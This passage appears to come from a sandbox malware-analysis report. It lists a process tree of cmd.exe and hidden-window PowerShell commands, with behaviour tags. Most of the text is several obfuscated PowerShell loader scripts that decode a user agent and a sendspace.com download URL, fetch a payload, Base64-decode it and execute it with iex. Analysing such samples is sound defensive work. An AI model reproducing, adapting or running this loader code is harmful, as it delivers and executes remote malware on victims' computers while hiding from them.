kComfofDestioBill rc.nsukBevik2Atten1St ng4Sekun= LivsNV,rateM,krowBerea- MalaO Sl tbDum,ejfordae Kloac.ulfot Dmon LikenSUdskly aakrs PerctForc eAftermAnd.i.SwollN Ligheaandetspeci.Ve,tiWSpillegensebManagCVrdillBuschiFletkePermanUdlbst');$Udviklingslinje+=$Swaths[1];Mrkerddes ($Udviklingslinje);Mrkerddes (Plastochondria 'Fodre$TalteP Ei,eiProfecCalatkSmedefRegimo ossrM llrkSandh2Fores1Spejl4Forg..ScenoHSeveresadisaHavnedLeptoe Cr srBesmrs avng[,emal$genneT R,cirSysteeBozinkRetievAn moa Sistr .ogttKern,lPl guaByfesnPotengImblaeLave ]Banem=Unsed$,rstaI RefumR,mmep SamgeMandot DinnuTrngsoProtosBeluroStepn ');$Alloploidy=Plastochondria 'Skrud$EpidiPGlyc iD,velcKle.kkAerobfBor voGammerAppa,kSemid2Sun.u1 Tale4Kursu. FilmDGymnaoM,niawSammenRecoglHaa,doMes ra KrlldS jerFGlosei briglDec,ieMerit(Com.b$.dspaCUnlacaRamlevPl.nti RevocNedtroSlutbrValgbnSynkr, Barf$Sa deSIndrmeMohurrkongrrja tgiHermef S rieEndgarHelafoProviu G aasProdu)Uncla ';$Serriferous=$Swaths[0];Mrkerddes (Plastochondria ' iv n$Ma.mugWrickl X.peoUantab St,naComp.l athe: .apeSStadso Udpib SenseSpicir Fdek=Vulga(UvenlTT,rskeS,leasSka.ttHoved-.nuskPPa.ana UncotVerdehSkrif Analo$.ropsSFoutreTarifrHeterrAstigiOutbafBon,eeB,ostrNonpooF,yveu NikosRenov)Postc ');while (!$Sober) {Mrkerddes (Plastochondria 'Incar$DivesgNaboblSm.laoBhl.nbTriseaAlperlDefan:K.ntiV AfskiVskerlPige iTaag.cHemataChlort DrveeRegio= Ra,d$Serrat Luc.rBa,dauZymiceadffr ') ;Mrkerddes $Alloploidy;Mrkerddes (Plastochondria 'Bec.aSGraadtIntr.aaars rRestftLan.b-j dgeSBewral Stnge Abeke emigpEcpho W osh4Petc. ');Mrkerddes (Plastochondria 'Mur e$HjemmgNikkilScra.olampebPalisaUdvi lLustr: ChriSJann.o.antobtrapeeGemalrT.rna=Perso(NonbaTCounteIncursStedbtKaffe- FutuP Karsa chlotSendeh .onn ,amme$Ir.elSHeimeePo merUnirarOperli Neo,fWellaemarg,rR,aktoform,uIdealsNonex)Ragge ') ;Mrkerddes (Plastochondria 'Subar$UnbiogGasmelS lfoo SdsubTregraOverjlSni s:ClaviHHadrioOfst.nLetteo Ee rrDoughap,atibBefalipredilJinx i Ro.ttPenu.iInd eeO.havsMorgn=R tin$Smgjag,xocolBreaco BenebVentaaSnapplVisit:U repD stgio len,nMet stTikameMarchn ,avr+Leg m+ Nomi%Chias$UnexcCinfilrBesaiiMacron B.wpoFly egCrcheeK.nkunTypeciInc mcB.aar.TalricTrioeo,ylinu oelnCarpotFejlu ') ;$Cavicorn=$Crinogenic[$Honorabilities];}$Inddmningers=330022;$Lydsenderne=29701;Mrkerddes (Plastochondria 'Ru er$ DampgClasslWoughoFantabRejekaGardelDaggr:ErgopKNavneoCivilnUnartt MetaoIsla,r PrcidSengea fo btUdmanaArricmPyrheaHa,ekt ,yroeWinterNickenMondneEkspes Heli organ=Teuto Opka GQuackeRedist,ainb-SagliCWelsho AgennEn,omtBehageP enonDividtUn el Allo$pi koSOuseleRemobrJubesr Servi Re,if iggeMos lr,istyo HjneuP lsesCasaq ');Mrkerddes (Plastochondria 'Outsw$Ci lcgHndellPademoVilkabForska.asmil Grie:UnuniSDr vekSmedniDunn,dNic.rtStyr.vEgenviStartgL,ppyt Aurii Ko,sgnanocsAfdratSu,ene Afros Rdst Kogia=Secre Escal[PyrrhSvidebyItalesEftert Upwee,roctmKalot.PosteC iblioProtrnNon,rvDispeeAfdamrPeriatEx.en]Theoc: Flam:IdeasF Forbr Ung oTaklemJemedB nullaUnp,rsCho,deMiner6 Redu4Agu nSun,eotP emoreneuhiKameen ,inagfremk(.runk$.rlinKIniquoSumman Ydert.raeno.dsver .roxd Overasho etUdkrsaUninum MonoaGidaftNatureIbrugrSam,en T lheTrilas Gran)Gudsf ');Mrkerddes (Plastochondria 'Chise$DeprogT,fstlSkndeo Intab D veaApachlShoot:Menstt DoktrfluorabevrtnBi.grsLempnvBa.ndeSvenssOks.htPhelli.agkotHydroi AlacsHermem Hovee EclasValgb Vekse=Sl,nt Ophi[e.lifSBylany U,ivs G.octkorr,e HydrmI.gat. onnaTDermoeBananx.onprtSevrd. PredE AnstnSmaancHenreoKdencd Rabai puyan Pu.lg Drin]Skjul: Asph: Ka,eA BentSPerniCCelleI scleIFo.ba.L genGKarayeCondut SteaSutilitPjaskrDeinoiModisn onsigHashp(Adden$Kr gsSTnderkSkiftiDialed arattSammevAnfgtiAfpudgMacrotKoloniPreprg.ekorsB,vistGrunde At msscler)Hirse ');Mrkerddes (Plastochondria 'Adjec$ D.gngPal,elGig,noT issbD,rata andslUrmag:FratrW RenwaLocullDy gndCoalsfG,ftelbaksguHumlet,edireTe or=.taal$ MasktFewterDataba C.imnCarpesUnknovSydsleExtrasAncistDepr iDoedetChivviSvingsEquanmKvarkeBesk sMidsp..inalsInteruGiftibSubpusMediatMoistrAnatoiTrallnMisdegRun,e(Ap,en$ O,diINotelnQ,ercd StofdLutismMishanMawoviSp ognHippogSkilteP aeprTripas Gene,Bgesk$TelefLC,tarymerendGardes aboneS yrenTilsedmistneTricyr.linin obsoeD vle)Snit, ');Mrkerddes $Waldflute;"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Seminifical.Vas && echo t"
5⤵
PID:4516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmmuwj.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:3308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Shayne = 1;$Erlenmeyer='Sub';$Erlenmeyer+='strin';$Erlenmeyer+='g';Function Stdbrndes($genuflectory){$Anomaliflorous=$genuflectory.Length-$Shayne;For($Mindelund=5;$Mindelund -lt $Anomaliflorous;$Mindelund+=6){$Dipteran+=$genuflectory.$Erlenmeyer.Invoke( $Mindelund, $Shayne);}$Dipteran;}function Misfielded($Antimilitaristers){. ($Overseeded) ($Antimilitaristers);}$Indespaerret=Stdbrndes ' ringMBinokoStra.zT.haaiPreadlUns.il Votaa Omso/Chice5Skrin.Uds i0Tempe Flerg(VarefWRtensiForsinHypoadTwistoele.awUnches,ewin unaccNLivsfT Ti f Ges,a1Jet.l0hjern.Ov rb0Appos;Cuddy ilboWMigraiRygernKemik6Egenr4Solv.; Vord KalaxAutoc6Vy.nw4Mirab; S ad RigserG ngevN cro:.ivil1Klovn2bibb.1 dihe. ,psp0Snu.r)Terre Re duGByggeeCoillcVrelskk.ittoTilpl/Nonse2.iama0 Tm,e1Leuca0Tring0 Syne1Insen0,adbr1Outre GulviF.dplaiconsprBokseeRestefFregaoAlberxL,men/ trkp1Nondi2Sjlln1Anti .Rens 0Taiku ';$Chargen98=Stdbrndes 'AcephU SlbesByg ee UdtyrCucha-.rhneApal bgHypote onconFllestPreco ';$dyresporene=Stdbrndes 'AfstuhHernstAfplitP ecop IsotsFl es:Flit./P.agi/KnaphwSociawSpydswDesor.Ratg,sSubste Lag n HelldAlca sFloodp SankaEsp,uc Sht.epr ll.KobbecMonoxoPh,sem Shel/Ocherp ForbrCheveo Lder/R,komdFredsl Mica/Didda6AfrmnlSan.szFilolqElsk,popk.l1Y.tri ';$lactarius=Stdbrndes 'Bufot>Demon ';$Overseeded=Stdbrndes 'MonkfiUbet eTre gxHunne ';$Violuric='Misstyling';$Ogdoads = Stdbrndes ' Ko feUrprecFirefh Bff oFortt Klli %SkkesaAtomkp us,ip.onotdGaranaMemsat PsycaDungb%Donke\Drejef Ma leStatun FordoBidralLys.re Recet FalbsUnder.LinieCGaso oCykelmHenvi ljka&Buska& essi UigeneSpanicRefinh hydroBund TebbtStove ';Misfielded (Stdbrndes 'Samme$ A.thgShewelAnimaoPrivibBalanaUdeerlMagni:Derm TPrelaiCrosslMuk.ebOver aAbateg PizzeSkepts.varilIlsabaSinecg BankeInsattFrembsVi te= Brug(Lovfoc ,ircmim.ledLymph ans/ ,nflcsandb seabo$Klip.OCoulogRedoudBrovtoMouthaEnd.sdSvib,sBit,h)Kryds ');Misfielded (Stdbrndes 'Rouge$krimigGuessl FrmaoEnravbStropa DrejlFo ml: ApozFSt eco,enkad OmtaeCerebrUn.stm Wro.eCounts ShartWestee Yabbr .isyeFortinUnvei=Baksg$RaafodDiaboyFilterTranseGarans ObjupDr veoSama.r reakeHstginUnspae Ch,o.AtionsSyriapBehanl BldtiPneumtLemon(Trive$Perspl Ana,askimlc AiletReasoaKendirSlag,i B.aeuSortbsBakun).olon ');$dyresporene=$Fodermesteren[0];$Rimfire= (Stdbrndes 'Grd,s$Skat.gResenl HykeoSpindbPe,peaEksoglPorte: B.ntopr.brpFi.mmr .ftee VandtBr,gehReaktoAdicilSkalpdgldsteCoenalUnionsthy,ieAnsttrCank.=Pr.inNMarkeeKundgw Beet-InterOConefbHjestjBackse SapocEl,kot Bort Ste.S K.isya,kumsInddrt Mayoe Non m Lukr.re.ksN S.mmeTrinktLue.f.ImperWDipheenon,lb SvalCGenopl Uguni Sa.feluf.fn malft');$Rimfire+=$Tilbageslagets[1];Misfielded ($Rimfire);Misfielded (Stdbrndes 'G,mma$Raadso .ombpSkambrAut xeBowldtMetafh acemotetral H,lld jrene Jubll HjemsTragueMonosrTerri.BlitzHLetmleAttriaR.tspdTeknieRa,gfr .ondsRejse[Prime$ IsleC NosehRegneaLsgaarKerengAnth,e.lkohnHukke9Weine8 Prol]Venst= Korr$Un,veIEncrenV.sitd N,veeNed.isnavigpPan.oa O.steAlpesr NubbrHe.rseLegitt Cro ');$Livsenergier=Stdbrndes 'Chili$Supero Fremp inserAkk iebr,evtDainthHusb.oK.ttllPa.kedassureCompulHarles ModseK.alir Go.a.D,iftDDefino Stttw FlytnHaovelElastoPrograUnderdsignaFDigi.iTy.salF,rroeVkk.r(Miscr$F angdR.tteySammerUnhare I,onsTechnp b ogoRe cur StareNomisnEkspoe.iitt,pluto$O.ercBTa anuunacccMucatc rooko Ya.knLudwiiKnalddOmkl,aRivaleUnder) Roll ';$Bucconidae=$Tilbageslagets[0];Misfielded (Stdbrndes ' Solu$Vesteg Scopl ,losoDoctrbBlgjeaWiresl Beaa:Elh,gSSubv eHoar.aGenermUndomoFinals T.letPol.t=Unind(ProgrT Sance FransCommotNitr.-,uberPFairyaslrentDmonihStivr Subco$.ndskBDo,inuwaitscMohiscHumploforbrnUdstri,senad ,ypeaHybrieC,lie) U de ');while (!$Seamost) {Misfielded (Stdbrndes 'Pneum$SoutagGrobilChefko Amatb obbyaSt,rtlHampe:UdspeULydsknTrinicKursulImperoHulk.tUrteph.kakse Reku=bonbo$Sandwtdi dor C,onuOestre Denu ') ;Misfielded $Livsenergier;Misfielded (Stdbrndes 'ScallS,eorgt isikaKapitrekstrt Symm-,kovhSAfsonl ndeeUnga e.eostpWindw Opvaa4Utilb ');Misfielded (Stdbrndes 'Thum.$Sorteg OverlDriftoRutelbHal daEr.lal Neur: U.soSChecke Mar.aT.ilimAlacroPi.nes FejltBild =wor i(Fo,trTTranceNbenesTopletSamme-redinPWel.oaOttektKatalhBrode Bygge$,dsenBOvermuModemcBetonc Sp,nofde tnKnastiDogmad,uppeaBasiaeBe.pe) hok ') ;Misfielded (Stdbrndes ' ldol$Strk,gPere lFalteoQuirkbV.rgiaPr.vil ulte:FakulU nathnHeralnStandaBevget SlutiR.vino avemnNo naaArchilRelat7Eff u2Sp,ro= E sk$Sniveg TelelDu.bio.iscjbkir.ea LavtlGallo:DivedPAgrissRati,eRbdiguA vardStudioOptaglReussiSorb cHasteh nwaveBerednBulme+Af is+Bladh%Tekno$.elesFMirexo PotedFuncte iltar C demXylopeAnkris Suppt C,raeStererPaleee paedn ,ate.Cho kc.uboro SygeuPrte,n SinttAngi ') ;$dyresporene=$Fodermesteren[$Unnational72];}$Afslagene=299463;$Gymnastikforening=28546;Misfielded (Stdbrndes 'Hoved$ NonegDolkel HieroVaku b ildeaKomprlChamb: SloaDImpo.aKonsur ArbatSinolaBaaregNabonnCirkuaReng.n Semi Busen=Dolk SpiffGSammeeAfrejtO,sig-UdhunC,ontsoAttn nSalpitDe.ateLiannnNvnentInef Sl.l$SludrB nituStemmc T incPrinto KrisnTetraiUndubdWcetcaPunk,eFortr ');Misfielded (Stdbrndes 'Dem,k$Openng CarulklargoLallab TrykaJor,elP,ide:NonceAThroatYula,oPe timDowediPseudsU.nihmSpildeQuestn Nonp Imbro=Delti Slad[ManifSUn.chyEskuasKv.litBru,teSellemSls,i.UdateCSgefao ummnBenefvKi,rke NvnerFejhetVildt] Roug:Sving:A,tieFSkolerCoffeoPselamRosicB P.ivaMidnts.amaheRadio6 Fire4Fre tSPy.rrtGdninrTeskeiDiss.n DebugKnapn(Sangf$Li,frDlubbea DistrSkraatprem a MakagAbsconGl coavomton Nedk)a,iza ');Misfielded (Stdbrndes ' Rep.$CyclogPajamlTropho RecebReti,aMarbllOmre :sidewSC risv Chaso KortlFaarevPeptid uggeiPredioMicroxCheesiOuangd Di.se U pumCapi.iBustlsO.zoasHemopiSkuldo maanTermis.tamp Brage= Resp Im ro[ MadrSOpistyindens Co,ttSte sepykelmPru,g. PersTske.re IndrxDisretSekti.SsterEComp.n ConscDionyoMu.iedS,erei ParanSouscg Jaup]There: Ch,c: maerA Do bSK,ipsC llegIReproIunacc.E,ectGF,rmae SladtOno,aS ForotNonrerTommeiFulfinGy ergFjorl(Crump$FormoACurabtAreltoSkiftmPl.mpi ouils .ecum UnmoeKomponDekol)Blayk ');Misfielded (Stdbrndes 'slbem$Staurg Eartl MilioDiathb.orraaGe,neldonsy:HeldiA JustkStaintRa.tpiListie slvflko.stiDominvMortas Co tfUlt moUnittr,kands ttesiO erakCamelrtelefiFilnunLaesegGaffeeWild,rHy,ocnSmalfePaa,esMor c=Usefu$ CausSSphenv S.emoAtomul ossovHologd SsteiCres.o Ch mxspurtitenp d Cr nePrecomch.ttiBrainsIatrisHyperiMetapoCisten UnstsProfe.,uckesNoncouCoelabPro.asOratotKapelrFejrei EvaknMetaxg,acqu(Sedim$,gnoeAVeltafLind sRetralL yalaDistrgMinuteNulp.nRaptueTeall,Afkrf$ Afs.GUnli.y,ectimFlerkn NondaLugtusSupratTroc.i Retak llefSamdeoHomeor onteHa,dlnElleviPaasknBri,lgIndom)P.kni ');Misfielded $Aktielivsforsikringernes;"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\fenolets.Com && echo t"
5⤵
PID:2916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gazcwc.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:4964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Tarogato = 1;$Caxton='Sub';$Caxton+='strin';$Caxton+='g';Function Charadrine($Backwaters){$Vedgaaelse120=$Backwaters.Length-$Tarogato;For($Meikes=5;$Meikes -lt $Vedgaaelse120;$Meikes+=6){$Kilometrage224+=$Backwaters.$Caxton.Invoke( $Meikes, $Tarogato);}$Kilometrage224;}function semibreve($Merlys){. ($Gaullismens) ($Merlys);}$Tilegnelses=Charadrine ' SpecMAfgruoOc.idzSe,eniSlgerl Pau.l afora Samm/Udpns5Platy.S yli0S.ale Fravr(m ddeWCapewiPenn,nZerafdMoario HempwNatt,s Afbl DepraNBlomsT Fo,l Ugos1 tubb0Kreme.Tinfa0Sving; Obje SilicW Vngei Til.nMidtv6,verw4Reswa;Figur CasimxE.oma6casca4Befra;Bucca Mart r.numevSu,er:Senio1 Pony2Undta1Kooki.Re or0Sor,s) ort LanchGBlu de Sprec ilbakP eexoDomes/Vadef2Purol0Undli1 elos0Mili 0Marg.1Crab,0 Face1Hoved regaFKaryoiDowc,rAfvare AdopfIndomo dninxKnaph/Besva1.emen2Sn,ps1Sum,e.Pyran0.ensu ';$Acuteness=Charadrine 'Kra.tUB.nyisFo saeHug,irParas-SyliaAforrdgG nioe FnysnV.ndlt Ing, ';$Donationes=Charadrine ' TzethBestttHva,rtKsemap IndysG,lop:clima/Erhol/Extraw HypewbrattwRefer.Benems Accee Skiln RenhdRegissFletdprespeaForducLaguneAlcoh.CheilcE.oxeolurifm Yong/ ArropTorkirUpgazoIlios/ Udd,d,tatilMolbo/Sex,suAra ruJerr.4 F,totFoetigSh,ngsQuaff ';$Unitar=Charadrine 'Co,di>Permu ';$Gaullismens=Charadrine ' Deg,iGentieBrickx,ilba ';$subvert='Layerages';$Suitcase = Charadrine ' TorteFejlbcCastihSpermoGrund Ubest%HeiniaKlynkpaarsbp Cya,dCaldraStatat ursea Me,o% Co,r\ EctoMInculiNonvisUrov,oCh.onbal.aeeSprogdSqu.riDep.neelfrenDeparcSorboeKiot..CursoU ystosMyxo aPar e Volc&I,dar& Lef IndeeUnlo,csemifh,aktuoFarmy Sap.ot Qu.e ';semibreve (Charadrine 'Ioan.$Monosg,vindl AdhroEp.lebStuntaTranslTeut :.ubveS WriekSterei SigtdMatere Her nS.mihg Anpaecholen H.nkeSylvasOver =Poten(B.okkcNonepmAristdMuffl Antip/AllokcUdbry Svir$ ScatS charu Stifi P.ostUndelc orela TransCatfaeUn he) dicl ');semibreve (Charadrine 'r,hne$Real.gKvalil,ubvaoaltanbEu oeacrasplFre t:DagboE St.ykOvermvK.elriStiltpDalboaRekylgUnappe gu.drsubsk=Midit$Ned,mDSulp,oOverinMenyiaBnkertA lysihaando Cal.nA.theeBebutsEnfra.Yac ts Prefpieee lUdfrsi rubbtVi co(consp$P litU M rin A ski laketunp ca Po irsimil)mi ie ');$Donationes=$Ekvipager[0];$Adventurespil= (Charadrine 'Nippl$ Gou.gPrehulS,rinoCritibTric.a As,el S yt: AlloO ungorUnclatRomerhDobbeoFar.jp Autoh Overo barnrDispli D.stcBecor=kvindNO,bygecerebw Barb-underObasilbHo pejSttteeU.stucLyasctPhysi Saf.fSPat oy Bog sDa intFrdigePolonm Ov r.Affa NPerkueFacontWilli.LiverWCrosseReforb agtCConselCitroiRh,deeFyldsnReklat');$Adventurespil+=$Skidengenes[1];semibreve ($Adventurespil);semibreve (Charadrine 'Fny e$CauseO .rumrMiddetSpithh KlbeoOverspErikshPlutoo Forlr LrepiGldnicRumpl.HydroHSneboeVidsya QuoidHomereInterrElektsBetog[Skra.$DeserA ekstcGymnou F rstGeniaeShylonNonmoeUnf esS,rngshyper]Major=Nonbl$De.inTDatabiReevalF.rreeAfrydgFoeisnBrordeS.ytolKiransSkrapeAdultsPropr ');$Poplydens=Charadrine 'tent.$AmmonOApparrTvrvet,acebhUngodoDriftpMalochAppleoPrak.r.eltpi Bl,mcK.ldk.BagtaDRealioI daawCranknSrintl NoneoA timagorgodCarcaFUtroliExpanlRigsdeFo.ol(Lemfl$Burn,DBaromoBa ann,iaskaFugtitPr siibavleoUnvoln.treneWoo esLegem,Hands$ArborTVicaraHofm.bLev,teLiquelNagapl ,imreUnderr ReadiVra,cnBrddegDrydeeUforfnOp.resCyclo)Al yl ';$Tabelleringens=$Skidengenes[0];semibreve (Charadrine ' Geby$Sa,fugN.llilproacoF.eelbStee,akollelBugfi: ThicA Monep StoraDisponCel,utPlasthR.strrOutroo K,nap afdei Narka Beli=Trans(rea gTBouquecoltisSortetDril.-kanebPLangtaTrstet.dbrihBarbe .ike$ fo.tT Ca iaBorgeb Hjeme.argal TretlInddaeVol mrUns aiArithnKrostgKranseDr ftn KalisLucr )Allow ');while (!$Apanthropia) {semibreve (Charadrine 'G.zel$ps.udgM.rjolCoveroPushcbRosanaForfalResid:BltesA TanglAmphiiSte mmcowweeBrazinUnsentWhidaaTetran P umtPub,i=Frem $Oplyst,alefr .eamuVedereSkr n ') ;semibreve $Poplydens;semibreve (Charadrine ' PlusSRmebltMa.niaD,menrArmfutRecen- HalvSliedtl Lin.eChokoe anbrp Sock Rumor4copro ');semibreve (Charadrine 'Fade.$Irratg .schl .ludo,niplb BrugahummelRecar:Thom AMiljrpCivilaBlochn Afd,t Tik hFrandr IndtoVeronpLaurbiFunkta mort= Triv(Rej eTSaltveUnprosRoosetSl,tt-BygniPMenuiaWonnetNucleh Akn. Fro,t$dobbeT AlloaCafarbR vdyeskruelCrummlAutoreStenrrRareriInstanAfmrkgfar,eeDissenDe aas Bakk)ol,ep ') ;semibreve (Charadrine 'Epith$HullogF.rrelFortro S rib elea GastlUnstr:RidtfUBourrlFon.soabro.vDu,kelfr.seiSulusgUdvalh.edsle MadvdMandreKredinstampsUnw.m=Forre$UvanigNabobl.ehngoOpda,b.mproaCh,nolRelig:BrachSSeashuNarr,k St.vkAtom eSquearUndersAfskukKoftga,ssetaPlumulPigrieVejdin Ju,os P.js+Socio+ Cull%Probl$briksECo.vokHankevNeds,i.ondipP oteaBrachgSk epePresprUnd.r. WheycIntenoBrandu equin MyaltAnt.o ') ;$Donationes=$Ekvipager[$Ulovlighedens];}$Horseplays170=297024;$Indlogeringens=29423;semibreve (Charadrine 'Ba.se$ uturgB neglNim.lodrankbBiog aDer.elS dam:GormaOMiscorAnstig Blo,aNa.ignout.aiNephrs G,jlaSpanitPopkoiPengeoAlnilnEthl i TelesSpi etHalvtsCrani1 Cont6Diska0Drift Udny=Tvil HarboGSkatte RepatAn er-DerurCBrodeo toucnR,ythtClauseNinnin.neyetJordl Ko,m$IndfrTTrve,aFizgib Elepe ombilDi,felDecareScat.rChanki hovenBroacg A.hjeGen nn.ruthsInspi ');semibreve (Charadrine 'Ilena$S.oepgDegenltongaoSkulpbLireka bronl Anti:Ale.aB FnyslmedgraBigemaDyrekmForpuuI.lumsRomewlI,ansiPas.anfars.gDorereEpistrFo.mnnampereDistisBal,s Allhe=Glunc Steno[ De,aSIndlryEmbuss Favot Roeje anegm Area. Ru bCAutopoFlagmnPrimuvCaligeLy,isrma.kutDvrgp]h,gie:Parad:IsozyF.atiorKluntoCrabbm RemaBHavana FlaksmaniseLrl,n6.rins4StoneSS,eedtStromrPasi,i PitanPenn,gAtlas(Stego$ R.inOStemmrge,segSurheaUnsonnCcilii,ordlsAnakoaReolptlokaliSkovloUnt.cnEnc.kiSko.esPeliktForngsT wer1 Tilb6Aasea0Nedis)Coeff ');semibreve (Charadrine 'Powde$ LicegUdgrflMyelao BredbY,psaaSignal mety:GaleeBVitamrLdreteKor.edSolstbF,oliaAm ryaAutomnNedsvdHovedsCentrkIohaba Reg pMell.aSub,rcPre,di DisstNa,skeScreet Ldr, Tvang=,rigs Camp[BattaSbankgyR sulsphys.tA,idoe rocem,uaia.SpectT Ea,veMuzzixEnergt Pigm.PantaEIndesnVandhc sm,do anisdProfeiForednTagsng Fyrv]J,mbi:Biavl:StribAHagleS RemoCDog.aISt ffIOrtho.cr,ckGReg ee losetSlaveSAngust Wi.cr.lektiEpilanMitigga,tov(Ind.a$SelveBStvrelCholeaTowelac.nstmSpaneuStaahsFinanlPreomi Ky.tnTonekgBinokeBeslurMood nHund.eMorphsSkaks)Neme. ');semibreve (Charadrine 'Sug,e$ DugegSlg,slSquiroguineb GadfaS.ilvlAntip:FloksfBe.emiOpholl Sl dmFllessHypo tPhotoj ShayePastir channArchpeUnderrTatovnAntireSpidssCessi=Refut$ AssoBUtypirAftraeFecund MentbO tpaa Goesa UdbenKorred rftesEco okRevoca EserpDelseaUnnamcvalleiBr nst BndeeYdmygtSka n.c arosEnspouIntreb,abbisHur,itByplarA,etsiReplanReumagFore (Bemis$ revaHThrauo Konsr.crous Pu.iep,nibpLobullSk leaundiny,uftisH rud1 Spre7Untra0 Nytt,Cogit$HydroINyor nK,ysodSacr,lPoruloTribogWestee mod r Bedsi VrdinAirelgCrapseYnkeln jenvsB,onz)Priv ');semibreve $filmstjernernes;"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:2384

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Misobedience.Usa && echo t"
5⤵
PID:3664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\glotmy.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:4636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Angribere122 = 1;$Opsnappede='Sub';$Opsnappede+='strin';$Opsnappede+='g';Function Postludiernes249($Herodotus){$Eremit=$Herodotus.Length-$Angribere122;For($Advance=5;$Advance -lt $Eremit;$Advance+=6){$Indhakning119+=$Herodotus.$Opsnappede.Invoke( $Advance, $Angribere122);}$Indhakning119;}function Forgifter110($Twisel){. ($Retorn25) ($Twisel);}$Culicidal=Postludiernes249 'AmbasM G ydoUdvikzPr.adiC,efrlFjer.lYardsaSuper/ Lder5Pledg.Ci ar0Hemia Witz.( D.saW levai Bun.nBaptidGummioSubkiwKramms ddel D.lmNPentaTDoug Mil.e1Barra0ankla.E,hyl0.xpec;Angdi UnforWSt.nsi,dbulnPedic6Seksu4Larse; Folk Nonprx,helt6Phaco4 Jule;trill ac.rrLejekv Ma,a: .oyo1Dem m2Bonny1Milli.Forma0Downw) F,ui Be alG TredeVisuocVelklkHvss oFejlf/St,ts2 A.pr0Konge1 Romp0 Crep0Sv.ge1Refin0Becla1Metam Jord Fmurmii.ypebrBeemaePl dgf mormoDelanx.olya/,rico1.icro2Mater1Edelg. Tur.0 Bili ';$Partipresses=Postludiernes249 ' StorUFodbosBadefeewersrOgler-r.etaAFatefgDeriseOphjenUnwift.esty ';$reskompagniers=Postludiernes249 'UnheahDem.ntUndert Schep,awpesGlyce:Fodbo/ ele,/PerniwFngslw IrrewCetor.KablesScenee Tidin,ersid duk.sCis,lpApartaregnsc Corne Q,in.FedtecAktiooOrthomPasto/Arbejp,linkruterloConti/ TarcdFlle,lUtilb/Bebas7Trans0R,reg6 Uop.3Metas6C,tinis lce ';$etiketteret=Postludiernes249 'Prohi>Is,la ';$Retorn25=Postludiernes249 ' guayi Punke slenx.agni ';$Prieur='Eftersprgselspres';$Sheals = Postludiernes249 'Fors.es jercCurtahPirago Cara Pla,%DebutaEkspapreemap BaardEmeriaTingltKanonaUkase%Sp,ge\gonzaMRupiaaGo.mat FelliSt kkoMurz.nflash.TraumRAfreaaBatocsGorm, Al eh&Sna.d&Rutp. Codeie,oistcTroglh Selvo Sv n Oensktbebar ';Forgifter110 (Postludiernes249 'Reakt$ Unbag Uni lscre.oSlumsb Neu.atemenlecono:BssegnrhesuiS.mitcOrlstkM litemicr,lS.midiBeslasPurcheSkole=puzzo(DisbacUdet.mi expdAfsvk P.yn/AppoicTheri I.ylp$KathlSbynkeha rikePsykoa konfl Worksdigen)skatt ');Forgifter110 (Postludiernes249 'Fortr$Paralg T,nel MedfoPeptibRecenaCa ollmul i:Ho.saF amplotinamrUnderr Sla,e Sej tBkke nTerm i ,lapn AndegRumvgsSamm,nAmpulaRecidvKonvon,aakierettr=Tresp$Un,ncrPolyneHangasklauskHyl do .pnam Revep,ongra O fygSexolnFly tiNe vse StasrInstisUnde..pindesNum epDeposlSenroiAcetitSalac(Ba.te$ Knipe AaretOv,rhiM.dtek T,aneStregt St,utMisdee HistrValfaeDaventWitch) jrec ');$reskompagniers=$Forretningsnavne[0];$Sporveje= (Postludiernes249 ' c rc$ FuldgOr,anlTjurbopectib,traaaVig,llPluto:DusinT ranhFast,rDis aeMoneteBefinpNostreCa,mid asko=FjortN ForveBorrow ,ewr-StateOBrendbV jspj,kyteeGa,gec DomdtW odm Herm,SPodopyLamels ConstFermeePar,omBloms.Ar aiNSkakteTilsktShel..LamelWUdb,eeSum,ebCirkuCNoum.lTrmasi .oineF,rhanOpistt');$Sporveje+=$nickelise[1];Forgifter110 ($Sporveje);Forgifter110 (Postludiernes249 '.mart$ArgenTObjekh Dri.rFernieTyr,teMadmopAnmrkeCar hdc onu.Ke,leH ParteFolkeaRdblodGenite ReagrSkaves ord[elekt$HolmgPBevida A.farPrad t,opubiEvidep,esairMusaleInte sForpes .ubceNonvisJarad]Grupp=Tilba$CedulCMaskiuOver.lTriumiHambucsmelliNat,rdH.pataPuljel Prud ');$Smrristet=Postludiernes249 'Au os$ naivT UndehPo,ynrPr dieBouile Mod.p aldreBedigdSelve.DemurDs,turoPetkiwSmaasnPerfel Piano InfaaIndkadAust,FOpsatiShe ml,ronzeT afi(T.rne$HamstrMo,faeReac.sMedspk.reckoPostem Kaf,p Stata Forhg SekrnUnposiP odeesnedrrSandasI.oen,Hemme$ I frNsubm.eMis.ha .etetVulgr)Aeros ';$Neat=$nickelise[0];Forgifter110 (Postludiernes249 'Tynds$KrokogIndfllCicinoh stebKlaveaTryghl nebe:Appenl MeteoDysphkTransa .atilra.ennh,pogeEjerit FransSucco=Calyc(TecunTY saoeBov,rsStatit .ybr- alleP ,pila dgnbt ColehSankt ,kesy$ The NUdludeRdninaAfstatIndig)Aeria ');while (!$lokalnets) {Forgifter110 (Postludiernes249 'Menne$moskkgAnakilProduo K mmbFormaaAnstelFril.: SeisAPhytolResumdJun ieG,ebarHep.as Ry ngFarinr He,tuVale,p Afr,p 